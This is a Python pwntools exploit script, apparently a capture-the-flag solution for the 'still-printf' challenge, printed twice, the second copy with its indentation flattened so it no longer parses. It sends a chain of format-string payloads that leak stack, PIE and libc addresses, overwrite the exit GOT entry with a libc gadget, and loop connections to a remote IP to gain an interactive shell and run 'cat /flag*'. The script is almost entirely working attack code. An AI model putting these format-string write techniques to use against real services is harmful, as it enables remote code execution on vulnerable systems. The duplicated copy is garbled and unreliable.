hkraw/hxp_still_printf.py

## hxp_still_printf.py
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
import random
import subprocess

def PID():
 print(subprocess.check_output(['pidof','still-printf']))

# Addr
libc_leak_offset = 0x2409b
gadget1 = 0x448a3
system = 0x449c0

# Hack
def Hack():
 global io

 exe = ELF('./still-printf')
 magic_number = 0x1337

 payload = ('%c%p'+'%c'*8 +'%c%c%c' +f'%{ (magic_number + 1 ) - (0xd + 0x5 + 0x8 )}c'+'%hn'+f'%{ 0xdd - ( (magic_number+1)&0xff) }c'+'%41$hhn').ljust(0x2f)
 print(hex(len(payload)))
 io.send(payload)

 io.recvuntil('\xd0')
 stack_leak = int(io.recvn(14),0)
 print(hex(stack_leak))

 payload2 = f'%{0xdd}c%11$hhn%12$p%13$p'.ljust(0x28,'A').encode() + p64(stack_leak - 0x8)[0:7]
 io.send(payload2)
 io.recvuntil('\xd0')
 pie_base = int(io.recvn(14),0) - 0x1200
 libc_leak = int(io.recvn(14),0)
 libc_base = libc_leak - libc_leak_offset
 print(hex(libc_base))
 print(hex(pie_base))


 payload3 = f'%{0xdd}c%11$hhn%{ ((pie_base+exe.got["exit"] )&0xffff) - 0xdd}c%10$hn'.ljust(0x20,'A').encode() + p64(stack_leak + 0x30)+p64(stack_leak - 0x8)[0:7]
 print(hex(len(payload3)))
 io.send(payload3)

 payload4 = f'%{0xdd}c%11$hhn%{ ( (libc_base+gadget1)&0xffff ) - 0xdd}c%12$hn'.ljust(0x28,'\0').encode() + p64(stack_leak - 0x8)[0:7]
 io.send(payload4)

 payload5 = f'%{0xdd}c%11$hhn%{ ( ( ( (libc_base+gadget1)&0xffffffff)&0xffff0000 ) >> 16 ) - 0xdd}c%10$hn'.ljust(0x20,'A').encode() + p64(pie_base+exe.got['exit']+0x2)+p64(stack_leak - 0x8)[0:7]
 io.send(payload5)

 payload6 = f'%{ (pie_base + 0x1100 )&0xffff}c%10$hn'.ljust(0x20,'\0').encode()+p64(stack_leak-0x8) + p64(0)[0:7]
 print(hex(len(payload6)))
 io.send(payload6)

for i in xrange(4096):
 try:
  #io = process('./still-printf')
  io = remote('168.119.161.224',9509)
  Hack()
  io.sendline('cat /flag*')
  data = io.recv()
  print(data)
  io.interactive()
 except:
  io.close()
  continue
	#!/usr/bin/python3
	from pwn import *
	from past.builtins import xrange
	from time import sleep
	import random
	import subprocess

	def PID():
	print(subprocess.check_output(['pidof','still-printf']))

	# Addr
	libc_leak_offset = 0x2409b
	gadget1 = 0x448a3
	system = 0x449c0

	# Hack
	def Hack():
	global io

	exe = ELF('./still-printf')
	magic_number = 0x1337

	payload = ('%c%p'+'%c'*8 +'%c%c%c' +f'%{ (magic_number + 1 ) - (0xd + 0x5 + 0x8 )}c'+'%hn'+f'%{ 0xdd - ( (magic_number+1)&0xff) }c'+'%41$hhn').ljust(0x2f)
	print(hex(len(payload)))
	io.send(payload)

	io.recvuntil('\xd0')
	stack_leak = int(io.recvn(14),0)
	print(hex(stack_leak))

	payload2 = f'%{0xdd}c%11$hhn%12$p%13$p'.ljust(0x28,'A').encode() + p64(stack_leak - 0x8)[0:7]
	io.send(payload2)
	io.recvuntil('\xd0')
	pie_base = int(io.recvn(14),0) - 0x1200
	libc_leak = int(io.recvn(14),0)
	libc_base = libc_leak - libc_leak_offset
	print(hex(libc_base))
	print(hex(pie_base))


	payload3 = f'%{0xdd}c%11$hhn%{ ((pie_base+exe.got["exit"] )&0xffff) - 0xdd}c%10$hn'.ljust(0x20,'A').encode() + p64(stack_leak + 0x30)+p64(stack_leak - 0x8)[0:7]
	print(hex(len(payload3)))
	io.send(payload3)

	payload4 = f'%{0xdd}c%11$hhn%{ ( (libc_base+gadget1)&0xffff ) - 0xdd}c%12$hn'.ljust(0x28,'\0').encode() + p64(stack_leak - 0x8)[0:7]
	io.send(payload4)

	payload5 = f'%{0xdd}c%11$hhn%{ ( ( ( (libc_base+gadget1)&0xffffffff)&0xffff0000 ) >> 16 ) - 0xdd}c%10$hn'.ljust(0x20,'A').encode() + p64(pie_base+exe.got['exit']+0x2)+p64(stack_leak - 0x8)[0:7]
	io.send(payload5)

	payload6 = f'%{ (pie_base + 0x1100 )&0xffff}c%10$hn'.ljust(0x20,'\0').encode()+p64(stack_leak-0x8) + p64(0)[0:7]
	print(hex(len(payload6)))
	io.send(payload6)

	for i in xrange(4096):
	try:
	#io = process('./still-printf')
	io = remote('168.119.161.224',9509)
	Hack()
	io.sendline('cat /flag*')
	data = io.recv()
	print(data)
	io.interactive()
	except:
	io.close()
	continue